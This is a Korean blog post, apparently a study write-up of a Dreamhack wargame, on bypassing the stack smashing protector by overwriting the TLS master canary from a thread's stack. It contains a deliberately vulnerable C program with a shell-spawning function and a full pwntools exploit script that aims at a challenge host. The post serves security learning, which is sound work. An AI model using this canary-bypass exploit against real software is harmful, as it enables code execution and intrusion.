Exploit Tech: Master Canary

🌇│System_Study/📕│Dreamhack_Hacking

Exploit Tech: Master Canary

Jastes 2022. 11. 13. 21:00

Master Canary

마스터 카나리를 스택 버퍼와 확인하는 법!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37 // Name: mc_thread.c
// Compile: gcc -o mc_thread mc_thread.c -pthread -no-pie
 
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
 
void giveshell() { execve("/bin/sh", 0, 0); }
 
void init() {
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
}
 
void thread_routine() {
  char buf[256];
  int size = 0;
 
  printf("Size: ");
  scanf("%d", &size);
  printf("Data: ");
  read(0, buf, size);
}
 
int main() {
  pthread_t thread_t;
  init();
 
  if (pthread_create(&thread_t, NULL, (void *)thread_routine, NULL) < 0) {
    perror("thread create error:");
    exit(0);
  }
 
  pthread_join(thread_t, 0);
  return 0;
}
Colored by Color Scripter cs

마스터 카나리는 로더에서 할당한 TLS 영역에 존재하고, 해당 페이지는 RW-로 존재합니다.
해당 영역을 이해하기 위해서는 아래 링크에 대하여 자세히 알 필요가 있습니다.

Background: Master Canary

Stack Smashing Protector(SSP)는 BOF로부터 ret 보호 기법으로써, 스택 버퍼가 존재하는 함수 내부에서 임의로 생성된 값을 버퍼 마지막에 삽입합니다. SSP 보호 기법을 배울 때 스택 카나리의 값이 위치한

dystopia050119.tistory.com

마스터 카나리는 main 함수가 호출전에 랜덤의 카나리를 쓰레드마다 전역 변수로 사용되는
TLS에 저장 이는 모든 쓰레드가 하나의 카나리 값을 사용하기 위해서이다.

일반적으론 마스터 카나리는 스택에 존재X로 BOF가 발생해도 Exploit이 불가능하지만..
쓰레드 스택의 경우는 예외적으로 쓰레드 스택에 마스터 카나리가 들어간다.

🛑여기서 잠깐!

쓰레드의 정확한 의미와 쓰레드가 왜 스택에 위치하는가?

먼저 쓰레드와 프로세스의 구분에 대하여 알아야합니다.

프로세스
: OS로부터 자원을 할당받는 작업의 단위
- 프로세서, 필요한 주소 공간, 메모리 등을 할당받음
쓰레드
: 할당받은 자원을 이용하는 실행의 단위
- 한 프로세스 내의 동작하는 여러 실행의 흐름
- 주소 공간이나 자원들을 같은 프로세스 내의 쓰레드끼리 공유하며 실행함

더 자세히는 아래 링크를 통해 살펴보시길 부탁드립니다.
제가 적고 싶었지만.. 사소한 부분에 시간을 날리기 싫기에.. ㅎ

독립적인 공간으로 다른 프로세스의 메모리 공간을 접근할 수 없다(보안문제로)
현제 우리는 stack과 heap의 사이의 영역의 쓰레드 stack의 부분을 공략하는 중입니다.

[OS]메모리 관점에서 본 쓰레드(thread)

기계식 키보드, 프로그래밍, 컴퓨터 관련 정보, IT 제품 관련 블로그입니다.

mooneegee.blogspot.com

긴 말보다는 위 이미지를 보시면 Process안에는 다수의 Thread가 존재합니다.
쓰레드는 프로세스 내에서 각 Stack만 따로 할당받고 Code, Data, Heap 영역을 공유합니다.
반면 프로세스는 다른 프로세스의 메모리에 접근할 수 없습니다.

위 설명을 확인해보시면 프로세스 간의 메모리 접근이 불가능하며,
마스터 카나리는 그러기에 TLS에 전역 변수로써 들어가게 됩니다.

그러기에 마스터 카나리는 전역 변수로써 전달되어 스택에 지정되기에 위의 설명이 진행됩니다.
쓰레드로 생성한 프로세스에서 카나리를 검정할 때 '마스터 카나리라는 값과 비교한다는 점..

이 이야기의 핵심은 쓰레드를 쓰는 환경에서만 스택에 존재하는 마스터 카나리를
덮어서 카나리를 우회 및 변조한다는 점이 핵심입니다.

giveshell 함수의 존재와 thread_routine 함수에서의 BOF의 가능성이 존재합니다.
그러기에 NX(giveshell)과 Partial RELRO&Canary(Master Canary exploit)으로 우회가 가능합니다.

pthread_create로 쓰레드를 생성시 마스터 카나리인 tcbhead_t 구조체의
stack_guard(master canary)를 복사하여 사용하기 땜에 이것을 덮어써 마스터 카나리를 조작할 수 있습니다

쓰레드로 생성한 프로세스에서 카나리를 검증할 때
마스터 카나리 값과 비교하여 릭을 하지 않아도 카나리 값과 마스터 카나리 값을 같게 조작이 가능!

dummy + canary + sfp + giveshell + dummy(buf-master canary) + master canary

위와 같은 순으로 정렬해야합니다.
그럼 우리는 ret와 master canary의 사이의 거리를 구해봅시다.

참고로 공부하면서 느낀건데 참고로 카나리는 지역변수 배열과 같이 사용되지 않는 경우에는
어느정도의 짧은 check와 같은 상수나 변수를 사용시에는 사용되지 않습니다.

그럼 마저 서로의 offset을 알아봅시다.
버퍼의 주소를 알아내기 위해 thread_routine 함수에 프보를 걸고,
read함수에 bof가 발생되니까 그 부분을 저장하는 rbp-0x110의 위치에서 확인해봅시다.

그럼 이제 마스터 카나리의 거리도 구하고 계산하면 끝나겠군요
이전에 카나리 구하는 법처럼 구한 후 fs+0x28의 계산처럼 접근하여 하는 방식도 있으나,
여기선 gdb에 $fs_base를 통해 fs 세그먼트 레지스터에 저장된 주소를 불러옵니다.

그리고 해당 주소에 0x28를 더한 값을 통해 계산할 수 있습니다.
그러면 해당 거리가 0x928로 확인할 수 있습니다.

dummy + canary + sfp + giveshell + dummy(buf-master canary) + master canary

해당 식을 이용하여 바로 exploit코드를 작성해봅시다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44 from pwn import *
import sys
 
 
def main():
    FILENAME = './mc_thread'
    HOST = 'host3.dreamhack.games'
 
    if(args['REMOTE']):
        p = remote(HOST, sys.argv[1])
    else:
        p = process(FILENAME)
 
    '''default Setting'''
    e = ELF(FILENAME, checksec=False)
    context(arch='amd64', os='linux', endian='little')
    context.log_level = 'debug'
    #context.cyclic_alphabet = 'ABC'
 
    giveshell = e.symbols['giveshell']
 
    '''payload script(buf-canary-sfp-ret)'''
    #payload = b'A'*0x114
    payload = b'A'* 264
    payload += b'A'*0x8   #canary 
    payload += b'B'*0x8      #sfp
    payload += p64(giveshell) #ret
 
    #payload += cyclic(0x928-len(payload))
    #payload += b'A'*(0x928-len(payload))
    payload += b'A'*(0x948-len(payload))
    #payload += b'AAAAAAAA' #master canary
    payload += p64(0x4141414141414141)
 
    inp_sz = len(payload)
 
    p.sendlineafter('Size: ', str(inp_sz))
    p.sendlineafter('Data: ', payload)
 
    p.interactive()
 
if __name__=="__main__":
    main()
 
Colored by Color Scripter cs

이 부분이 핵심으로 나머지 위에 코드는 취향차이이므로 넘어가도록 합시다.
위에 canary leak을 할 때처럼 rbp-0x108(264)가 총 버퍼의 크기이며,
나머지는 위에 설명에서처럼 하면.. 짜란! 끝이 나게됩니다.

참고로 저 환경은 linux Ubuntu 18.04버전으로 해야지 되더라고요
그 과정은.. 위와 같기에 넘어가도록 합시다.(뒤에 나머지도 그런데.. ㅠ 나중에 추가적으로 고치겠습니다.)
일정에 치여서 이상한곳에 삽질을 많이 해서 ㅠ

참고 자료

Exploit Tech: Master Canary

이번 코스에서는 Master Canary를 이용해 Canary Leak 없이 익스플로잇 하는 방법에 대해 소개합니다.

dreamhack.io

03.Canaries - TechNote - Lazenca.0x0

Excuse the ads! We need some help to keep our site up. List Canaries Canaries 또는 Canary word는 버퍼 오버 플로우를 모니터하기 위해 버퍼와 제어 데이터 사이에 설정 된 값입니다.버퍼 오버플로가 발생하면 Canary

www.lazenca.net

👩‍💻 프로세스 vs 쓰레드 차이 정리

프로세스(Process) 프로세스라는 명칭은 낯설수 있는데, 프로그램은 친숙하리라 생각된다. 우리가 흔히 말하는 프로그램이 실행되면 프로세스 인스턴스가 생성된다. 인스턴스가 생성된다는 의미

inpa.tistory.com

참고 이미지

저작자표시 비영리 변경금지